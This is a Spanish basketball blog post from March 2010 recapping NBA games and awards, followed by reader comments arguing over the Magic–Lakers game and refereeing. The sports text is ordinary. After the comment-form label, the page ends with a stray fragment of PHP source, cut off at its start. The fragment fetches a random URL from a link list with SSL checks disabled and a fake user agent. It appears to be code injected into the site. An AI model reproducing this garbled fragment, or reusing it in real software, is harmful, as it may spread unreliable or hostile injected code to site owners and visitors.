La Crónica (06/03/2010)

07 de March de 2010 por TheDeerHunter

Empezaremos por asuntos positivos. No encontraron ningún tipo de anomalía cardíaca en Rodney Stuckey y ayer mismo ya fue dado de alta. Deseamos que no vuelva a sufrir ningún incidente de este tipo en lo sucesivo y que su juego nos haga pronto vibrar tanto como lo ha hecho en determinadas fases de la competición.

No tan positivo fue el reparto de tollinas que tuvo lugar en Phoenix. Ya hacía algún tiempo que no veíamos a nadie romperle la cara a Steve Nash. Viene a ocurrir en frecuencia inversamente proporcional al nivel de juego que despliegue ya que no cabe duda de que resulta un método contundentemente efectivo para lograr pararle. No recordábamos haber visto, sin embargo, un gesto de este tipo en un profesional de la talla de Earl Watson. Ayer le sobraron los codazos y le faltó baloncesto. La derrota vino precisamente originada desde el juego exterior de Indiana, que no logró igualar el buen nivel que mostró el frontcourt. No le sirvió de mucho entonces la jugada. De premio sí se llevó una buena colleja de Frye, con el consiguiente broncón y la expulsión del mismo. Ni con esas.
Después el señor Tony Parker se rompió la mano en la victoria de los Spurs ante Memphis. Seis semanitas en el dique seco que le dejan con muchas dudas para playoffs siempre que los Spurs logren clasificarse sin él, obviamente.

En el plano meramente deportivo dos noticias destacadas. La derrota de los Cavs (sin LeBron) en Milwaukee, con Jennings en plan estelar precisamente el día después de haberle criticado tanto desde estos lares. La otra noticia fue la victoria de los Nets en el Madison. Parece que D’Antoni ha perdido completamente la confianza en sus bases porque anoche no se le ocurrió otra que alinear de base titular a T-Mac. Más torcido no le pudo salir. El respetable cargó sus iras contra el pobre “primo” que firmó una actuación memorablemente horrorosa.

En el resto de encuentros, más menos, se cumplió el guión. Quitando quizás la victoria de los Heat frente a Atlanta. Los Bobcats doblegaron a los Warriors; los Mavs sufrieron contra los Bulls y ni Houston ni Utah tuvieron problemas contra Minesotta ni Clippers.

PREMIOS

MVP: Dwane Wade está fuertecito. 38 puntos, 10 asistencias y 4 rebotes para destrozar a los Hawks. Ya se lo habíamos visto hacer otras veces.

El Rookie: Jennings nos cerró momentáneamente la boca con 25 puntos y 6 asistencias… Eso sí, un 43% en tiro que es de lo mejorcito que le hemos visto (como será lo peorcito…)

La sorpresa: Entre Courtney Lee y Devin Harris, 56 puntos que impulsaron a su equipo a la victoria. No es que no creamos que sean capaces de eso y de mucho más. Es sólo que ya casi no nos acordábamos de ello.

La decepción: Doble decepción por lo que le supone a Sergio. McGrady protestado en el Madison por intentar cumplir en el puesto de base. Entiendo que la culpa no fue de él.

El mayor esfuerzo en vano: Se lo daremos a Antawn Jamison, que vuelve por sus fueros pero con la camiseta de los Cavs. 30 puntos, 11 rebotes y 5 robos en la noche que faltaba el rey.

Comenta

19 comentarios a esta entrada

  1. Dantley2 dice:
    #1

    Creo que D’Antoni ayer le hizo bastante daño a McGrady, al equipo y a Sergio por este orden. Debe rectificar y dejarse de iluminadas antes de que la cosa vaya a peor.

      Citar

  2. dunc dice:
    #2

    Creo que lo de Watson a Nash no fue ayer, sino en el anterior enfrentamiento, miradlo! Ayer solo fue la tollina de Frye a Watson y la posterior trifulca.

      Citar

  3. TheDeerHunter dice:
    #3

    pues tienes razón dunc… confusión mía.
    que sirva tu apunte como corrección al artículo.
    gracias

      Citar

  4. kantonyo dice:
    #4

    Joder, que miedo da Nash en esa foto…..

      Citar

  5. Dantley2 dice:
    #5

    eso mismo pensé al ver la foto, Kantonyo, parece fuera de sí mismo, de película de miedo. Y otra cosa curiosa, con esa pinta no sé por qué pero parece mucho más joven

      Citar

  6. Txusma dice:
    #6

    Entre que está un poco bizco, esa sonrisa de loco y toda esa sangre… Parece que se haya acabado de comer un cerebro o algo!

      Citar

  7. HeiNeKeN dice:
    #7

    menuda foto la de Nash… parece sacada de la tipica pelicula de zombis americana…

    Por cierto, menudo pique entre Barnes y Kobe en el partido de ayer…

      Citar

  8. Txusma dice:
    #8

    Y la falta es de Barnes?? Villarato!

      Citar

  9. TheDeerHunter dice:
    #9

    Ayer los Magic iban excesivamente venados… y terminaron de arrastrar a los Lakers a una guerra de guerrillas.
    Para pique el de Pau y Howard. Creo que nunca había visto a Pau soltar una coz como la que le dió a supermán. No se cortó un duro… y me parece lógico, en cierto modo.
    La diferencia de criterio entre las faltas que le pitaron al pardillo de Bynum frente a las que NO le pitaron a Howard fueron factor decisivo… pero más decisivo fue la decisión de Kobe de jugarse el partido a la ruleta rusa de los tiros imposibles (aunque él sea capaz de meter uno de cada dos tiros imposibles mínimo)
    Por eso digo en el informe que no ha entendido nada de lo que ha pasado en los Lakers sin él.

    El de anoche otro partido de playoffs por anticipado. En esta ocasión de calidad poca… pero emoción y polémica para parar un barco. Me temo que también es indicativo de lo que veremos arbitralmente… pésimos.

      Citar

  10. max dice:
    #10

    Me he quedado alucinado viendo a Matt Barnes vacilando todo el partido a Kobe Bryant!! Lo que nos quedaba por ver! Ha hecho un amago de lanzarle el balón a la cara de Kobe, y los arbitros mirando para otro lado. Como dice Txusma, Villarato! jaja

      Citar

  11. Love Denise dice:
    #11

    Excepcional partido el Orlando-Los angeles,
    Sobre el partido, estupendo partido de los que me gustan, bronco, tenso, con intensidad al 150%, con mucho pique y trash talking. Excepcional Matt Barnes (me quito el sombrero ante él) defendiendo, vacilando e intentando sacar de sus casillas a Bryant y gran partido de todos los de Florida, jugando con una rabia tremenda. Sobre Pau, comentar que es un pedazo jugador como la copa de un pino, y el mejor 4 del mundo actualmente, pero, espero que algún asistente o sus asesores de imagén le diga que deje de lloriquear como una nenaza, que en los últimos partidos están muy protestón y llorón. No entiendo como un tipo tan aparentemente inteligente como él, se picó con Howard, y más cuando ya demostró en las Finales que lo puede defender sin necesidad de ir llorando por las canchas, y para la proxima vez…., no acaricies a Howard, que creo que ni se enteró de la falta y encima consiguió el 2+1. En un partido tan tenso, me decepcionó un poco la actuación de Artest, no digo que hiciera lo del Palace Auburn, pero sí jugar con más sangre.
    Respecto a Orlando, comentar que siempre me ha parecido la mejor plantilla del campeonato (independientemente si ganan o no la NBA), es dificil encontrar y realizar una plantilla de 12 jugadores tan compensada, llena de diferentes recursos y con tanta calidad). Matricula de Honor para el General Manager Otis Smith.
    Sobre Lakers, ya sabemos que Kobe es muy bueno, pero que se las tire todas no es bueno para el equipo, es incomprensible que teniendo a jugadores de la talla de Gasol, Odom, etc.., éstos no huelan bola y no meta ni un pase dentro, el ataque angelino empieza a ser demasiado previsible, aunque no culpo por ello a Bryant, que bastante hace con meterlas de todos los colores, supongo que Phil tendrá algo que ver en esto.

      Citar

  12. TheDeerHunter dice:
    #12

    Coincido en lo de excepcional… fue un partidazo… aunque para mi gusto le faltó calidad y le sobró un punto de intensidad. El punto que le hubieran dado unos árbitros de estar en su papel y no en el de cagones medio ciegos.
    No conozco con exactitud ciertos supuestos del reglamento, pero me da a mí que la vacilada del balonazo debería de haber estado sancionada con una técnica, por aquello del menosprecio al contrario y tal (no estoy hablando del trash talk) aunque para lo que le afectó a Kobe y nada, eso sí que fue ignorar. Más pareció importarle a él la toña que se llevó tras el mate y rodillas arriba. Sólo vacila quien puede, amigo Barnes. No es su caso. Sí el de Kobe.
    Me llama la atención que hables de Pau llorón y al mismo tiempo ensalces la actitud de Barnes. Todo el partido literalmente lloriqueando y repartiendo, repartiendo y lloriqueando. Para mí fue un ejemplo de partido cobarde, protegido extrañamente por los árbitros. Ya puede rezar para no tener que medirse a Kobe en una hipotética final, porque se las iba a cobrar todas juntas.
    Dices que Pau está llorón. Ya comenté que eso le beneficia en la NBA donde demasiadas veces se pita de oído. Antes nos quejábamos de que no le hicieran ni caso. Es curioso que no menciones la lloriqueada de Howard cuando le pitaron la 4ª… también la 5ª con falta a Kobe. Le faltó revolcarse por el suelo, porque todo lo demás lo hizo, pataleos incluídos. El caso es que a él le sirvió, porque la falta (5ª o 6ª no recuerdo) fue clara justo antes del ostión de Pau. Dices que no lo notó… me temo que de 2+1 nada, falló los dos tiros libres de la flagrante y el leñazo lo hubiera notado un caballo. De no cogerse al aro hubiera acabado encima de los espectadores. Diría que fue incluso excesivo pero…¿qué demonios? es nuestro “blando” Pau y aquel es Supermán (se supone)
    Sobre Artest… me sigue pareciendo extrañísimo la apreciación que tenéis todos. Vince Carter lo sufrió ayer, totalmente asfixiado en la segunda parte… y se fue a tantos puntos por los “aliados” ya mencionados (¿10 tiros libres en el primer cuarto??? ¿que me estás contando??casi tantos como todos los Lakers en todo el partido!! Y el último taponazo lo pitaban otra vez más falta, quedando apenas un minuto y empatados en el marcador) Por otro lado su actitud impecable frente a todo el juego sucio a su alrededor. Estuvo fallón, eso sí.
    Lo dicho… 25 faltas de Orlando por 28 de los Lakers. Bynum todo el partido en el banco y Howard y compañía poniéndose las botas a dar estopa. Me parece literalmente una broma de mal gusto. Igual no me lo hubiera parecido tanto de no haber visto el partido. Lo malo es que sospecho que volverá a ser así en PO. Una lástima para el buen baloncesto. La mejor plantilla del campeonato no debería necesitar rebajarse a eso.

      Citar

  13. Love Denise dice:
    #13

    No se, no se, tampoco considero lo de Barnes una agresión o desconsideración hasta el punto de sancionarlo, aunque tampoco conozco el reglamento integramente en ese aspecto. Pero…también Kobe, Garnett , Melo , Lebron vacilan, o sólo las estrellas tienen derecho a a vacilar? y que conste que no critico a Kobe, Lebron por ello, me gustan los piques y ques e vacilen los unos a los otros, lo veo como síntoma de intensidad , por algo no me gusta el ALL Star Game donde todos se parten el culo mientras hacen un psaillo para que el saltarín de turno machaque de espaladas.
    Sobre Pau llorón, esta bien que se intente respetar, puede hacerlo una, dos, pero no todo el partido llorando, la prensa y el publico lo pueden encasillar como eso, teatrero y llorón, y el perjudicado será él entonces. Con la calidad que atesora en sus manos, no creo que le haga falta ir por las canchas como una nena.
    Howard llorón? si lo fuera hubiera magnificado el leñazo de Gasol, se hubiera tirado por los suelos, revoloteandose, y hubieran expulsado al español, en cambió, optó por ignorarlo e irse como un señor a la linea de tiros libres.
    No creo que los Magic ganaran por los arbitros.

      Citar

  14. TheDeerHunter dice:
    #14

    No vaya, no me quejo de todo el trash talk… y ciertas vaciladas. De acuerdo contigo conque a veces pueden ser síntoma de intensidad. Me quejo del amago de balonazo, que para mi tiene tanta duda como si habláramos de los sancionable que resultaría si Kobe o Artest hubieran amagado con romperle la crisma de un puñetazo o con un bate de beísbol.

    Pau también se mostró como un señor en algunas ocasiones… sobre todo cuando le señalaban las faltas (que al contrario del caso de Howard no fueron todas) Howard protestó tanto o más que Pau este partido… En cualquier caso no observo esa realidad tal y como la pintas. Para mí, con límites, el quejarse y hacer aspavientos en la NBA es el abc… y maestros de eso hay a patadas a todos los niveles (Duncan, Phil Jackson, Sloan…) podría dar miles de ejemplos. Dudo mucho que le vayan a encasillar a Pau por eso a estas alturas.

    Por último yo no digo que los Magic ganaran por los árbitros. Sabes que opino que son un excelente equipo. Digo que se aplicó un doble rasero evidente en las faltas sancionadas y eso es un extra fundamental en un partido tan sumamente físico como el del otro día o los que se avecinan en playoffs.

      Citar

  15. HeiNeKeN dice:
    #15

    Lo del amago de darle un balonazo en la cabeza, aqui en España te pitan tecnica (siempre que el arbitro lo vea)…

      Citar

  16. Love Denise dice:
    #16

    Sinceramente, no veo para tanto lo de Matt Barnes. Pienso que con este tema se está haciendo una duna de un puñado de arena, quizás si se lo hubiese hecho a Farmar.., no se hable tanto de esta jugada que ha dado la vuelta al mundo.

      Citar

  17. TheDeerHunter dice:
    #17

    Bueno, yo no estoy pidiendo que lo apaleen y le arranquen las vísceras en algún lugar público.
    Yo sólo apunto que eso es, tanto sancionable como deleznable y que va en la línea de lo que fue el partido a nivel arbitral.
    Imagina que el muy capullo te lo hace a ti. A bote pronto me recuerda a lo de los escupitajos de Etoo, salvando las distancias, por supuesto.

      Citar

  18. Love Denise dice:
    #18

    no lo veo deleznable, igual que cuando Kobe, o Lebron meten una canasta ganadora en el ultimo segundo, y miran a su defensor de forma prepotente y altanera. Yo, al menos, no sancionaría ese tipo de cosas, creo que aportan valor añadido a la competición (siempre y cuando no haya violencia), es decir, no considero violenta la accion de Barnes, ni las miradas prepotentes de las estrellas.

      Citar

  19. TheDeerHunter dice:
    #19

    pues yo creo que no estamos hablando de lo mismo comparando ambas cosas
    y me parece indiscutible que un gesto como ese o como el de amagar un puñetazo, no es otra cosa que violencia.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>